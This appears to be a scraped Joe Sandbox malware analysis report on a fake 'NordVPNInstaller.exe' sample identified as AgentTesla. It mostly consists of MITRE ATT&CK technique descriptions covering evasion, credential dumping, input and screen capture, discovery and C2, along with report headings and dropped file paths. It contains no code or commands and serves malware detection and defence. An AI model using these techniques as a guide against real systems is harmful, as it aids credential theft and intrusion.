Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NordVPNInstaller.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NordVPNInstaller_d32f2326bebabb555fd0cd20d617137cdc2e5360_00000000_58333de5-1d69-400c-bfdb-2fd94689eea2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAAB.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC04.tmp.xml

C:\Users\user\AppData\Roaming\ScreenShot\screen.jpeg

C:\Users\user\AppData\Roaming\bbb\bbb.exe

C:\Users\user\AppData\Roaming\bbb\bbb.exe:Zone.Identifier

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
NordVPNInstaller.exe

Function 053D2C7C Relevance: 12.3, Strings: 9, Instructions: 1073
COMMON

Function 067F4120 Relevance: 4.3, Strings: 3, Instructions: 521
COMMON

Function 053D1D68 Relevance: 1.6, APIs: 1, Instructions: 123
libraryCOMMON

Function 0669EAA8 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 435
libraryCOMMON

Function 067F0F00 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331
libraryCOMMON

Function 067F0EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 316
libraryCOMMON

Function 0669EEE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142
libraryCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre